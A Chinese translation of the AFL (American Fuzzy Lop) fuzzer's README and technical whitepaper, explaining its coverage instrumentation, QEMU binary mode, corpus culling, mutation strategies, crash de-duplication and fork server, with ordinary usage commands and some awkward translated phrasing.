在Linux上，可选的QEMU模式也允许对黑盒二进制文件进行模糊测试。 AFL的变体和衍生物允许您模糊Python，Go，Rust，OCaml，GCJ Java，内核系统调用，甚至整个虚拟机。 还有一个密切启发的进程模糊器，它在LLVM中运行，并且是一个在Windows上运行的分支。 最后，AFL是OSS-Fuzz背后的模糊引擎之一。 哦 - 如果你安装了gnuplot，你可以使用afl-plot来获得漂亮的进度图。 0x03 AFL特点 非常复杂。它是一种插桩器（instrumentation）引导的遗传模糊器，能够在各种非平凡的目标中合成复杂的文件语义，减少了对专用的语法识别工具的需求。它还带有一个独特的崩溃浏览器，一个测试用例最小化器，一个故障触发分配器和一个语法分析器 - 使评估崩溃错误的影响变得简单。 智能。它围绕一系列经过精心研究，高增益的测试用例预处理和模糊测试策略而构建，在其他模糊测试框架中很少采用与之相当的严格性。结果，它发现了真正的漏洞。 它很快。由于其低级编译时间或仅二进制检测和其他优化，该工具提供了针对常见现实世界目标的近原生或优于原生的模糊测试速度。新增的持久模式允许在最少的代码修改的帮助下，对许多程序进行异常快速的模糊测试。 可以链接到其他工具。模糊器可以生成优质，紧凑的测试语料库，可以作为更专业，更慢或劳动密集型流程和测试框架的种子。它还能够与任何其他软件进行即时语料库同步。 0x04 AFL README Written and maintained by Michal Zalewski &#108;&#99;&#97;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#x6f;&#x67;&#108;&#x65;&#x2e;&#x63;&#111;&#109; Copyright 2013, 2014, 2015, 2016 Google Inc. All rights reserved. Released under terms and conditions of Apache License, Version 2.0. For new versions and additional information, check out: http://lcamtuf.coredump.cx/afl/ To compare notes with other users or get notified about major new features, send a mail to &#97;&#x66;&#108;&#45;&#x75;&#115;&#101;&#114;&#115;&#x2b;&#x73;&#117;&#98;&#115;&#99;&#x72;&#105;&#98;&#101;&#64;&#103;&#111;&#111;&#x67;&#108;&#101;&#103;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#109;. See QuickStartGuide.txt if you don’t have time to read this file. 1）具有导向性的模糊测试的挑战Fuzzing是用于识别真实软件中的安全问题的最强大且经过验证的策略之一;它负责安全关键软件中迄今为止发现的绝大多数远程代码执行和权限提升漏洞。不幸的是，模糊测试也不够有力。盲目的、随机的变异使得它不太可能在测试代码中达到某些代码路径，从而使一些漏洞超出了这种技术的范围。已经有许多尝试来解决这个问题。早期方法之一 - 由Tavis Ormandy开创 - 是一种 语义库蒸馏（corpus distillation） 。网上找到的一些大型语料库中往往包含大量的文件，这时就需要对其精简，该方法依赖于覆盖信号从大量高质量的候选文件语料库中选择有趣种子的子集，然后通过传统方式对其进行模糊处理。该方法非常有效，但需要这样的语料库随时可用。正因为如此，代码覆盖率 也只是衡量程序执行状态的一个简单化的度量，这种方式并不适合后续引导fuzzing测试的。其他更复杂的研究集中在诸如 程序流分析（“concoic execution”），符号执行或静态分析 等技术上。所有这些方法在实验环境中都非常有前景，但在实际应用中往往会遇到可靠性和性能问题 - 部分高价值的程序都有非常复杂的内部状态和执行路径，在这一方面符号执行和concolic技术往往会显得不够健壮（如路径爆炸问题），所以仍然稍逊于传统的fuzzing技术。 2）afl-fuzz方法American Fuzzy Lop是一种暴力模糊测试，配有极其简单但坚如磐石的 引导遗传算法 。它使用修改后的边覆盖率，轻松地获取程序控制流程的细微局部变化。简化一下，整体算法可以概括为： 1）将用户提供的初始测试用例加载到队列中， 2）从队列中获取下一个输入文件， 3）尝试将测试用例修剪到不会改变程序测量行为的最小尺寸， 4）使用平衡且经过充分研究的各种传统模糊测试策略反复改变文件， 5）如果任何生成的编译导致由instrumentation记录的新状态转换，则将变异输出添加为队列中的新条目。 6）转到2。 发现的测试用例也会定期被淘汰，以消除那些被更新，更高覆盖率的发现所淘汰的测试用例。并经历其他几个插桩驱动（instrumentation-driven）的努力最小化步骤。作为模糊测试过程的一个副作用，该工具创建了一个小型，独立的有趣测试用例集。这些对于播种其他劳动力或资源密集型测试方案非常有用 - 例如，用于压力测试浏览器，办公应用程序，图形套件或闭源工具。该模糊器经过全面测试，可提供远远优于盲目模糊或仅覆盖工具的开箱即用性能。 3）用于AFL的插桩（instrumentation）程序当源代码可用时，可以通过配套工具 注入instrumentation ，该工具可作为第三方代码的任何标准构建过程中gcc或clang的替代品。instrumentation具有相当适度的性能影响;与afl-fuzz实现的其他优化相结合，大多数程序可以像传统工具一样快速或甚至更快地进行模糊测试。 重新编译目标程序 的正确方法可能会有所不同，具体取决于构建过程的具体情况，但几乎通用的方法是：123$ CC = /path/to/afl/afl-gcc ./configure$ make clean all对于C ++程序，您还需要将CXX = / path /设置为/ afl / afl g ++。 clang组件（afl-clang和afl-clang ++）可以以相同的方式使用; clang用户也可以选择利用更高性能的检测模式，如llvm_mode / README.llvm中所述。 在测试库时，您需要查找或编写一个简单的程序，该程序从stdin或文件中读取数据并将其传递给测试的库。在这种情况下，必须 将此可执行文件与已检测库的静态版本相链接 ，或者确保在运行时加载正确的.so文件（通常通过设置LD_LIBRARY_PATH）。最简单的选项是 静态构建 ，通常可以通过以下方式实现：1$ CC = /path/to/afl/afl-gcc ./configure --disable-shared 调用make时设置AFL_HARDEN = 1将导致CC组件自动启用代码强化选项，以便更容易检测到简单的内存错误。 Libdislocator，AFL附带的帮助程序库（请参阅libdislocator / README.dislocator）也可以帮助发现堆损坏问题。PS。建议ASAN用户查看notes_for_asan.txt文件以获取重要警告。 4）检测仅二进制应用程序当源代码为不可得时，afl为黑盒二进制文件的快速、即时检测提供实验支持。 这是通过在较不为人知的“用户空间仿真”模式下运行的QEMU版本来实现的。QEMU是一个独立于AFL的项目，但您可以通过以下方式方便地构建该功能：12$ cd qemu_mode$ ./build_qemu_support.sh 有关其他说明和注意事项，请参阅qemu_mode / README.qemu。该模式比编译时插桩（instrumentation）慢约2-5倍，对并行化的兼容较差，并且可能有一些其他的不同。 5）选择初始测试用例为了正确操作，模糊器需要一个或多个起始文件，其中包含目标应用程序通常所需的输入数据的良好示例。 有两个基本规则： 测试用例足够小。 1 kB以下是理想的，尽管不是绝对必要的。 有关大小重要性的讨论，请参阅perf_tips.txt。 只有在功能上彼此不同时才使用多个测试用例。 使用五十张不同的度假照片来模糊图像库是没有意义的。您可以在此工具附带的testcases/子目录中找到许多启动文件的好例子。PS。 如果有大量数据可用于筛选，您可能希望使用afl-cmin实用程序来识别在目标二进制文件中使用不同代码路径的功能不同的文件的子集。 6）模糊测试二进制文件测试过程本身由afl-fuzz实用程序执行。该程序需要一个带有初始测试用例的只读目录，一个存储其输出结果的独立位置，以及要测试的二进制文件的路径。对于直接从 stdin 接受输入的目标二进制文件，通常的语法是：1$ ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program [... params ...] 对于从 文件 中获取输入的程序，使用“@@”标记目标命令行中应放置输入文件名的位置。模糊器将替换为您：1$ ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ 您还可以使用-f选项将变异数据写入特定文件。如果程序需要特定的文件扩展名，那么这很有用。非插桩二进制文件可以在QEMU模式下（在命令行中添加-Q）或在传统的盲目模糊模式（指定-n）中进行模糊测试。您可以使用-t和-m覆盖已执行进程的默认超时和内存限制;perf_tips.txt中讨论了优化模糊测试性能的技巧。 请注意，afl-fuzz首先执行一系列确定性模糊测试步骤，这可能需要几天时间，但往往会产生整齐的测试用例。如果你想要快速结果 - 类似于zzuf和其他传统的模糊器 - 在命令行中添加-d选项。 7）解释输出有关如何解释显示的统计信息以及监视进程运行状况的信息，请参阅status_screen.txt文件。请务必查阅此文件，尤其是如果任何UI元素以红色突出显示。模糊过程将持续到按Ctrl-C为止。至少，您希望允许模糊器完成一个队列周期，这可能需要几个小时到一周左右的时间。在输出目录中创建了三个子目录并实时更新： 队列queue/ - 测试每个独特执行路径的案例，以及用户提供的所有起始文件。这是第2节中提到的合成语料库。在将此语料库用于任何其他目的之前，您可以使用afl-cmin工具将其缩小到较小的大小。该工具将找到一个较小的文件子集，提供相同的边缘覆盖。 崩溃crash/ - 导致被测程序接收致命信号的独特测试用例（例如，SIGSEGV，SIGILL，SIGABRT）。条目按接收信号分组。 挂起hang/ - 导致测试程序超时的独特测试用例。将某些内容归类为挂起之前的默认时间限制是1秒内的较大值和-t参数的值。可以通过设置AFL_HANG_TMOUT来微调该值，但这很少是必需的。崩溃和挂起被视为“唯一” “如果相关的执行路径涉及在先前记录的故障中未见的任何状态转换。如果可以通过多种方式达到单个错误，那么在此过程中会有一些计数通货膨胀，但这应该会迅速逐渐减少。 崩溃和挂起的文件名与父、非错误的队列条目相关联。这应该有助于调试。如果无法重现 afl-fuzz 发现的崩溃，最可能的原因是您没有设置与工具使用的内存限制相同的内存限制。尝试：12$ LIMIT_MB = 50$（ulimit -Sv $ [LIMIT_MB &lt;&lt; 10]; /path/to/tested_binary ...） 更改LIMIT_MB以匹配传递给afl-fuzz的-m参数。在OpenBSD上，也将-Sv更改为-Sd。任何现有的输出目录也可用于恢复中止的作业;尝试：$ ./afl-fuzz -i-o_ existing_output_dir [...etc...]如果安装了gnuplot，您还可以使用afl-plot为任何活动的模糊测试任务生成一些漂亮的图形。有关如何显示的示例，请参阅 http://lcamt​​uf.coredump.cx/afl/plot/ 。 8）并行模糊测试每个afl-fuzz的实例大约占用一个核。 这意味着在多核系统上，并行化是充分利用硬件所必需的。有关如何在多个核心或多个联网计算机上模糊常见目标的提示，请参阅parallel_fuzzing.txt。并行模糊测试模式 还提供了一种简单的方法，用于将AFL连接到其他模糊器，动态符号执行（concrete and symbolic， concolic execution）引擎等等; 再次，请参阅 parallel_fuzzing.txt的最后一节以获取提示。 9）Fuzzer词典默认情况下，afl-fuzz变异引擎针对紧凑数据格式进行了优化 - 例如，图像，多媒体，压缩数据，正则表达式语法或shell脚本。它有点不太适合具有特别冗长和冗余的语言的语言 - 特别是包括HTML，SQL或JavaScript。为了避免构建语法感知工具的麻烦，afl-fuzz提供了一种方法，使用与目标数据类型相关联的其他特殊标记的语言关键字，魔术头或可选字典为模糊测试过程设定种子，并使用它来重建底层随时随地的语法：http://lcamt​​uf.blogspot.com/2015/01/afl-fuzz-making-up-grammar-with.html要使用此功能，首先需要使用dictionaries/README.dictionaries中讨论的两种格式之一创建字典;然后通过命令行中的-x选项将模糊器指向它。（该子目录中也已提供了几个常用字典。）没有办法提供基础语法的更多结构化描述，但模糊器可能会根据instrumentation反馈单独找出一些。这实际上在实践中有效，比如说：http://lcamt​​uf.blogspot.com/2015/04/finding-bugs-in-sqlite-easy-way.htmlPS。即使没有给出明确的字典，afl-fuzz也会尝试通过在确定性字节翻转期间非常接近地观察instrumentation来提取输入语料库中的现有语法标记。这适用于某些类型的解析器和语法，但不如-x模式好。如果字典真的很难找到，另一个选择是让AFL运行一段时间，然后使用作为AFL伴随实用程序的令牌捕获库。为此，请参阅libtokencap/README.tokencap。 10）崩溃分类基于coverage的崩溃分组通常会生成一个小型数据集，可以手动或使用非常简单的GDB或Valgrind脚本快速进行分类。每次崩溃都可以追溯到队列中的父级非崩溃测试用例，从而更容易诊断故障。话虽如此，重要的是要承认，如果没有大量的调试和代码分析工作，一些模糊的崩溃很难快速评估可利用性。为了帮助完成这项任务，afl-fuzz支持使用-C标志启用的非常独特的“崩溃探索”模式。在此模式下，模糊器将一个或多个崩溃测试用例作为输入，并使用其反馈驱动的模糊测试策略，非常快速地枚举程序中可以达到的所有代码路径，同时使其保持在崩溃状态。不会导致崩溃的变异会被拒绝;任何不影响执行路径的更改也是如此。输出是一个小文件集，可以非常快速地检查以查看攻击者对错误地址的控制程度，或者是否有可能超过初始越界读取，并查看下面的内容。 哦，还有一件事：对于测试用例最小化，请尝试afl-tmin。该工具可以以非常简单的方式操作：$ ./afl-tmin -i test_case -o minimize_result - /path/to/program [...] 该工具适用于崩溃和非崩溃的测试用例。在崩溃模式下，它将很乐意接受 instrumented 和 non-instrumented 的二进制文件。在非崩溃模式下，最小化器依赖于标准AFL检测来使文件更简单而不改变执行路径。minimizer与afl-fuzz兼容的方式接受-m，-t，-f和@@语法。如果指定了参数-x，即crash mode，会把导致程序非正常退出的文件直接剔除。 AFL的另一个新成员是afl-analyze工具。需要输入文件，尝试按顺序翻转字节，并观察测试程序的行为。然后根据哪些部分看起来是关键的，哪些部分不是关键的，对输入进行颜色编码;虽然不是万能，但它通常可以提供对复杂文件格式的快速见解。有关其操作的更多信息可以在technical_details.txt的末尾找到。 11）超越崩溃模糊测试是一种很好的，未充分利用的技术，用于发现非崩溃的设计和实现错误。通过修改目标程序调用abort()时发现了一些有趣的错误，比如： 当给出相同的模糊输入时，两个bignum库产生不同的输出， 当要求连续多次解码相同的输入图像时，图像库会产生不同的输出， 在对模糊提供的数据进行迭代序列化和反序列化时，序列化/反序列化库无法生成稳定的输出， 当要求压缩然后解压缩特定blob时，压缩库会生成与输入文件不一致的输出。实施这些或类似的健全性检查通常只需要很少的时间;如果你是特定包的维护者，你可以使用#ifdef FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION（一个也与libfuzzer共享的标志）或#ifdef __AFL_COMPILER（这个只适用于AFL）来使这个代码成为条件。 12）常识性风险请记住，与许多其他计算密集型任务类似，模糊测试可能会给您的硬件和操作系统带来压力。特别是： 你的CPU会很热，需要充分冷却。在大多数情况下，如果冷却不足或停止正常工作，CPU速度将自动受到限制。也就是说，尤其是在不太合适的硬件（笔记本电脑，智能手机等）上进行模糊测试时，某些事情并非完全不可能爆发。 有针对性的程序可能最终不正常地抓取千兆字节的内存或用垃圾文件填满磁盘空间。 AFL试图强制执行基本的内存限制，但不能阻止每一个可能的事故。最重要的是，您不应该对数据丢失前景不可接受的系统进行模糊测试。 模糊测试涉及数十亿次对文件系统的读写操作。在现代系统中，这通常会被高度缓存，导致相当适度的“物理”I/O - 但是有许多因素可能会改变这个等式。您有责任监控潜在的问题; I / O非常繁重，许多HDD和SSD的使用寿命可能会缩短。监视Linux上磁盘I/O的一种好方法是’iostat’命令：$ iostat -d 3 -x -k [...可选磁盘ID ...] 13）已知的限制和需要改进的领域以下是AFL的一些最重要的警告： AFL通过检查由于信号（SIGSEGV，SIGABRT等）而导致的第一个衍生过程死亡来检测故障。为这些信号安装自定义处理程序的程序可能需要注释掉相关代码。同样，由模糊目标产生的子处理中的故障可能会逃避检测，除非您手动添加一些代码来捕获它。 与任何其他强力工具一样，如果使用加密，校验和，加密签名或压缩来完全包装要测试的实际数据格式，则模糊器提供有限的覆盖范围。要解决这个问题，你可以注释掉相关的检查（参见experimental / libpng_no_checksum /获取灵感）;如果这是不可能的，你也可以编写一个后处理器，如experimental / post_library /中所述。 ASAN和64位二进制文​​件存在一些不幸的权衡。这不是因为任何特定的模糊错误;请参阅notes_for_asan.txt以获取提示。 没有直接支持模糊网络服务，后台守护程序或需要UI交互才能工作的交互式应用程序。您可能需要进行简单的代码更改，以使它们以更传统的方式运行。 Preeny也可以提供一个相对简单的选项 - 请参阅：https://github.com/zardus/preeny有关修改基于网络的服务的一些有用提示也可以在以下位置找到：https://www.fastly.com/blog/how-to-fuzz-server-american-fuzzy-lop AFL不输出人类可读的覆盖数据。如果你想监控覆盖，请使用Michael Rash的afl-cov：https：//github.com/mrash/afl-cov 偶尔，敏感的机器会对抗他们的创造者。如果您遇到这种情况，请访问http://lcamt​​uf.coredump.cx/prep/。除此之外，请参阅安装以获取特定于平台的提示。 0x05 afl-fuzz白皮书本文档提供了American Fuzzy Lop的简单的概述。想了解一般的使用说明，请参见 README 。想了解AFL背后的动机和设计目标，请参见 historical_notes.txt。 0）设计说明(Design statement)American Fuzzy Lop 不关注任何单一的操作规则(singular principle of operation)，也不是一个针对任何特定理论的概念验证(proof of concept)。这个工具可以被认为是一系列在实践中测试过的hacks行为，我们发现这个工具惊人的有效。我们用目前最simple且最robust的方法实现了这个工具。唯一的设计宗旨在于速度、可靠性和易用性。 1）覆盖率计算(Coverage measurements)在编译过的程序中插桩能够捕获分支（边缘）的覆盖率，并且还能检测到粗略的分支执行命中次数(branch-taken hit counts)。在分支点注入的代码大致如下： 123cur_location = &lt;COMPILE_TIME_RANDOM&gt;; //用一个随机数标记当前基本块shared_mem[cur_location ^ prev_location]++; //将当前块和前一块异或保存到shared_mem[]prev_location = cur_location &gt;&gt; 1; //cur_location右移1位区分从当前块到当前块的转跳 cur_location 的值是随机产生的，为的是简化连接复杂对象的过程和保持XOR输出分布是均匀的。shared_mem[] 数组是一个调用者 (caller) 传给被插桩的二进制程序的64kB的共享空间。其中的每一字节可以理解成对于插桩代码中特别的元组(branch_src, branch_dst)的一次命中（hit）。选择这个数组大小的原因是让冲突(collisions)尽可能减少。这样通常能处理2k到10k的分支点。同时，它的大小也足以使输出图能在接受端达到毫秒级的分析。 Branch cnt Colliding tuples Example targets 1,000 0.75% giflib, lzo 2,000 1.5% zlib, tar, xz 5,000 3.5% libpng, libwebp 10,000 7% libxml 20,000 14% sqlite 50,000 30% - 这种形式的覆盖率，相对于简单的基本块覆盖率来说，对程序运行路径提供了一个更好的描述(insight)。特别地，它能很好地区分以下两个执行路径： A -&gt; B -&gt; C -&gt; D -&gt; E (tuples: AB, BC, CD, DE) A -&gt; B -&gt; D -&gt; C -&gt; E (tuples: AB, BD, DC, CE) 这有助于发现底层代码的微小错误条件。因为 安全漏洞通常是一些非预期(或不正确)的语句转移(一个tuple就是一个语句转移) ，而不是没覆盖到某块代码。上边伪代码的最后一行移位操作是为了让tuple具有定向性(没有这一行的话，A^B和B^A就没区别了，同样，A^A和B^B也没区别了)。采用右移的原因跟Intel CPU的一些特性有关。 2）发现新路径(Detecting new behaviors)AFL的fuzzers使用一个全局Map来存储之前执行时看到的tuple。这些数据可以被用来对不同的trace进行快速对比，从而可以计算出是否新执行了一个dword指令/一个qword-wide指令/一个简单的循环。当一个变异的输入产生了一个包含新tuple的执行路径时，对应的输入文件就被保存，然后被发送到下一过程(见第3部分)。对于那些没有产生新路径的输入，就算他们的instrumentation输出模式是不同的，也会被抛弃掉。这种算法考虑了一个非常细粒度的、长期的对程序状态的探索，同时它还不必执行复杂的计算，不必对整个复杂的执行流进行对比，也避免了路径爆炸的影响。为了说明这个算法是怎么工作的，考虑下面的两个路径，第二个路径出现了新的tuples(CA, AE):12#1: A -&gt; B -&gt; C -&gt; D -&gt; E#2: A -&gt; B -&gt; C -&gt; A -&gt; E 因为#2的原因，以下的路径就不认为是不同的路径了，尽管看起来非常不同：#3: A -&gt; B -&gt; C -&gt; A -&gt; B -&gt; C -&gt; A -&gt; B -&gt; C -&gt; D -&gt; E 除了检测新的tuple之外，AFL的fuzzer也会粗略地记录tuple的命中数(hit counts)。这些被分割成几个buckets：1, 2, 3, 4-7, 8-15, 16-31, 32-127, 128+ 从某种意义来说，buckets里边的数目是有实际意义的：它是一个8-bit counter和一个8-position bitmap的映射。8-bit counter是由桩生成的，8-position bitmap则依赖于每个fuzzer记录的已执行的tuple的命中数。单个bucket的改变会被忽略掉: 在程序控制流中，bucket的转换会被标记成一个interesting change，传入evolutionary(见第三部分)进行处理。通过命中次数(hit count)，我们能够分辨控制流是否发生变化。例如一个代码块被执行了两次，但只命中了一次。并且这种方法对循环的次数不敏感(循环47次和48次没区别)。这种算法通过限制内存和运行时间来保证效率。 另外，算法通过设置执行超时，来避免效率过低的fuzz。从而进一步发现效率比较高的fuzz方式。 3）输入队列的进化(Evolving the input queue)经变异的测试用例，会使程序产生 新的状态转移 。这些测试用例稍后被添加到 input 队列中，用作下一个 fuzz 循环。它们补充但不替换现有的发现。这种算法允许工具可以持续探索不同的代码路径，即使底层的数据格式可能是完全不同的。如下图： 这里有一些这种算法在实际情况下例子： pulling-jpegs-out-of-thin-air afl-fuzz-nobody-expects-cdata-sections 这种过程下产生的语料库基本上是这些输入文件的集合：它们都能触发一些新的执行路径。产生的语料库，可以被用来作为其他测试的种子。使用这种方法，大多数目标程序的队列会增加到大概1k到10k个entry。大约有10-30%归功于对新tupe的发现，剩下的和hit counts改变有关。下表比较了不同 fuzzing 方法在发现文件句法(file syntax)和探索程序执行路径的能力。插桩的目标程序是 GNU patch 2.7.3 compiled with -O3 and seeded with a dummy text file: Fuzzer guidance strategy used Blocks reached Edges reached Edge hit cnt var Highest-coverage test case generated (Initial file) 156 163 1.00 (none) Blind fuzzing S 182 205 2.23 First 2 B of RCS diff Blind fuzzing L 228 265 2.23 First 4 B of -c mode diff Block coverage 855 1,130 1.57 Almost-valid RCS diff Edge coverage 1,452 2,070 2.18 One-chunk -c mode diff AFL model 1,765 2,597 4.99 Four-chunk -c mode diff 第一行的blind fuzzing (“S”)代表仅仅执行了一个回合的测试。第二行的Blind fuzzing L表示在一个循环中执行了几个回合的测试，但是没有进行改进。和插桩运行相比，需要更多时间全面处理增长队列。 在另一个独立的实验中也取得了大致相似的结果。在新实验中，fuzzer被修改成所有随机fuzzing 策略，只留下一系列基本、连续的操作，例如位反转(bit flips)。因为这种模式（mode）将不能改变输入文件的的大小，会话使用一个合法的合并格式（unified diff）作为种子。 Queue extension strategy used Blocks reached Edges reached Edge hit cnt var Number of unique crashes found (Initial file) 624 717 1.00 - Blind fuzzing 1,101 1,409 1.60 0 Block coverage 1,255 1,649 1.48 0 Edge coverage 1,259 1,734 1.72 0 AFL model 1,452 2,040 3.16 1 在之前提到的基于遗传算法的fuzzing，是通过一个test case的进化(这里指的是用遗传算法进行变异)来实现最大覆盖。在上述实验看来，这种“贪婪”的方法似乎没有为盲目的模糊策略带来实质性的好处。 4）语料筛选（Culling the corpus）上文提到的渐进式语句探索路径的方法意味着：假设A和B是测试用例(test cases)，且B是由A变异产生的。那么测试用例B达到的边缘覆盖率(edge coverage)是测试用例A达到的边缘覆盖率的严格超集(superset)。为了优化fuzzing，AFL会用一个快速算法周期性的重新评估(re-evaluates)队列，这种算法会选择队列的一个更小的子集，并且这个子集仍能覆盖所有的tuple。算法的这个特性对这个工具特别有利(favorable)。算法通过指定每一个队列入口(queue entry)，根据执行时延（execution latency）和文件大小分配一个分值比例（score proportional）。然后为每一个tuple选择最低分值的entry。这些tuples按下述流程进行处理： 12345671) Find next tuple not yet in the temporary working set,2) Locate the winning queue entry for this tuple,3) Register *all* tuples present in that entry&apos;s trace in the working set,4) Go to #1 if there are any missing tuples in the set. “favored” entries 产生的语料，会比初始的数据集小5到10倍。没有被选择的也没有被扔掉，而是在遇到下列对队列时，以一定概率略过：12345678- If there are new, yet-to-be-fuzzed favorites present in the queue, 99% of non-favored entries will be skipped to get to the favored ones.- If there are no new favorites:- If the current non-favored entry was fuzzed before, it will be skipped 95% of the time.- If it hasn&apos;t gone through any fuzzing rounds yet, the odds of skipping drop down to 75%. 基于以往的实验经验，这种方法能够在队列周期速度(queue cycling speed)和测试用例多样性(test case diversity)之间达到一个合理的平衡。使用afl-cmin工具能够对输入或输出的语料库进行稍微复杂但慢得多的的处理。这一工具将永久丢弃冗余entries，产生适用于afl-fuzz或者外部工具的更小的语料库。 5）输入文件修剪（Trimming input files）文件的大小对fuzzing的性能有着重大影响(dramatic impact)。因为大文件会让目标二进制文件运行变慢；大文件还会减少变异触及重要格式控制结构(format control structures)的可能性(我们希望的是变异要触及冗余代码块(redundant data blocks))。这个问题将在perf_tips.txt细说。用户可能提供低质量初始语料(starting corpus)，某些类型的变异会迭代地增加生成文件的大小。所以要抑制这种趋势(counter this trend)。幸运的是，插桩反馈(instrumentation feedback)提供了一种简单的方式自动削减（trim down）输入文件，并确保这些改变能使得文件对执行路径没有影响。afl-fuzz内置的修剪器(trimmer)使用变化的长度和步距(variable length and stepover)来连续地(sequentially)删除数据块；任何不影响trace map的校验和(checksum)的删除块将被提交到disk。这个修剪器的设计并不算特别地周密(thorough)，相反地，它试着在精确度(precision)和进程调用execve()的次数之间选取一个平衡，找到一个合适的block size和stepover。平均每个文件将增大约5-20%。独立的afl-tmin工具使用更完整(exhaustive)、迭代次数更多(iteractive)的算法，并尝试对被修剪的文件采用字母标准化的方式处理。 6) 模糊测试策略(Fuzzing strategies)插桩提供的反馈(feedback)使得我们更容易理解各种不同fuzzing策略的价值，从而优化(optimize)他们的参数。使得他们对不同的文件类型都能同等地进行工作。afl-fuzz用的策略通常是与格式无关（format-agnostic），详细说明在下边的连接中：binary-fuzzing-strategies-what-works值得注意的一点是，afl-fuzz大部分的(尤其是前期的)工作都是高度确定的(highly deterministic)，随机性修改和测试用例拼接(random stacked modifications和test case splicing)只在后期的部分进行。 确定性的策略 包括：12345- Sequential bit flips with varying lengths and stepovers,使用变化的长度和步距来连续进行位反转- Sequential addition and subtraction of small integers,对小的整型数来连续进行加法和减法- Sequential insertion of known interesting integers (0, 1, INT_MAX, etc),对已知的感兴趣的整型数连续地插入 使用这些确定步骤的目的在于，生成紧凑的(compact)测试用例，以及在产生non-crashing的输入和产生crashing的输入之间，有很小的差异(small diffs)。非确定性(non-deterministic)策略 的步骤包括：stacked bit flips、插入(insertions)、删除(deletions)、算数(arithmetics)和不同测试用例之间的拼接(splicing)。 由于在historical_notes.txt 中提到的原因(性能、简易性、可靠性)，AFL通常不试图去推断某个特定的变异(specific mutations)和程序状态(program states)的关系。 fuzzing的步骤名义上来说是盲目的(nominally blind)，只被输入队列的进化方式的设计所影响(见第三部分)。 这意味着，这条规则有一个例外：当一个新的队列条目，经过初始的确定性fuzzing步骤集合时，并且文件的部分区域被观测到对执行路径的校验和没有影响，这些队列条目在接下来的确定性fuzzing阶段可能会被排除。尤其是对那些冗长的数据格式，这可以在保持覆盖率不变的情况下，减少10-40%的执行次数。在一些极端情况下，比如一些block-aligned的tar文件，这个数字可以达到90%。 7) 字典(Dictionaries)插桩提供的反馈能够让它自动地识别出一些输入文件中的语法(syntax)符号(tokens)，并且能够为测试器(tested parser)检测到一些组合，这些组合是由预定义(predefined)的或自动检测到的(auto-detected)字典项(dictionary terms)构成的合法语法(valid grammar)。关于这些特点在afl-fuzz是如何实现的，可以看一下这个链接：afl-fuzz-making-up-grammar-with大体上，当基本的(basic, typically easily-obtained)句法(syntax)符号(tokens)以纯粹随机的方式组合在一起时，插桩和队列进化这两种方法共同提供了一种反馈机制，这种反馈机制能够区分无意义的变异和在插桩代码中触发新行为的变异。这样能增量地构建更复杂的句法(syntax)。这样构建的字典能够让fuzzer快速地重构非常详细(highly verbose)且复杂的(complex)语法，比如JavaScript, SQL,XML。一些生成SQL语句的例子已经在之前提到的博客中给出了。有趣的是，AFL的插桩也允许fuzzer自动地隔离(isolate)已经在输入文件中出现过的句法(syntax)符号(tokens)。 8) 崩溃去重（De-duping crashes）崩溃去重是fuzzing工具里很重要的问题之一。很多naive的解决方式都会有这样的问题：如果这个错误发生在一个普通的库函数中(如say, strcmp, strcpy)，只关注出错地址(faulting address)的话，那么可能导致一些完全不相关的问题被分在一类(clustered together)。如果错误发生在一些不同的、可能递归的代码路径中，那么校验和(checksumming)调用栈回溯(call stack backtraces)时可能导致crash count inflation(通胀)。 afl-fuzz的解决方案认为满足一下两个条件，那么这个crash就是唯一的(unique)：12- The crash trace includes a tuple not seen in any of the previous crashes,这个crash的路径包括一个之前crash从未见到过的tuple。- The crash trace is missing a tuple that was always present in earlier faults.这个crash的路径不包含一个总在之前crash中出现的tuple。 这种方式一开始容易受到count inflation的影响，但实验表明其有很强的自我限制效果。和执行路径分析一样，这种 崩溃去重 的方式是afl-fuzz的基石(cornerstone)。 9) 崩溃调查(Investigating crashes)不同的crash的可用性(exploitability)是不同的。afl-fuzz提供一个crash的探索模式(exploration mode)来解决这个问题。对一个已知的出错测试用例，它被fuzz的方式和正常fuzz的操作没什么不同，但是有一个限制能让任何non-crashing 的变异(mutations)会被丢弃(thrown away)。这种方法的意义在以下链接中会进一步讨论：afl-fuzz-crash-exploration-mode这种方法利用instrumentation的反馈，探索crash程序的状态，从而进一步通过歧义性的失败条件，找到了最新发现的input。对于crashes来说，值得注意的是和正常的队列条目对比，导致crash的input没有被去掉，为了和它们的父条目（队列中没有导致crash的条目）对比，它们被保存下来，这就是说afl-tmin可以被用来随意缩减它们。 10) The fork server为了提升性能，afl-fuzz使用了一个”fork server”，fuzz的进程只进行一次execve(), 连接(linking), 库初始化(libc initialization)。fuzz进程通过copy-on-write(写时拷贝技术)从已停止的fuzz进程中clone下来。实现细节在以下链接中：fuzzing-binaries-without-execvefork server被集成在了instrumentation的程序下，在第一个instrument函数执行时，fork server就停止并等待afl-fuzz的命令。对于需要快速发包的测试，fork server可以提升1.5到2倍的性能。 11) 并行机制实现并行的机制是，定期检查不同cpu core或不同机器产生的队列，然后有选择性的把队列中的条目放到test cases中。详见： parallel_fuzzing.txt. 12）二进制instrumentationAFL-Fuzz对二进制黑盒目标程序的instrumentation是通过QEMU的“user emulation”模式实现的。这样我们就可以允许跨架构的运行，比如ARM binaries运行在X86的架构上。QEMU使用basic blocks作为翻译单元，利用QEMU做instrumentation，再使用一个和编译期instrumentation类似的guided fuzz的模型。1234567if (block_address &gt; elf_text_start &amp;&amp; block_address &lt; elf_text_end) &#123; cur_location = (block_address &gt;&gt; 4) ^ (block_address &lt;&lt; 8); shared_mem[cur_location ^ prev_location]++; prev_location = cur_location &gt;&gt; 1;&#125; 像QEMU, DynamoRIO, and PIN这样的二进制翻译器，启动是很慢的。QEMU mode同样使用了一个fork server，和编译期一样，通过把一个已经初始化好的进程镜像，直接拷贝到新的进程中。当然第一次翻译一个新的basic block还是有必要的延迟，为了解决这个问题AFL fork server在emulator和父进程之间提供了一个频道。这个频道用来通知父进程新添加的blocks的地址，之后吧这些blocks放到一个缓存中，以便直接复制到将来的子进程中。这样优化之后，QEMU模式对目标程序造成2-5倍的减速，相比之下，PIN造成100倍以上的减速。 13）afl-analyze工具文件格式分析器是最小化算法的简单扩展前面讨论过; 该工具执行一系列步行字节翻转，然后在输入文件中注释字节运行，而不是尝试删除无操作块。]]></content>
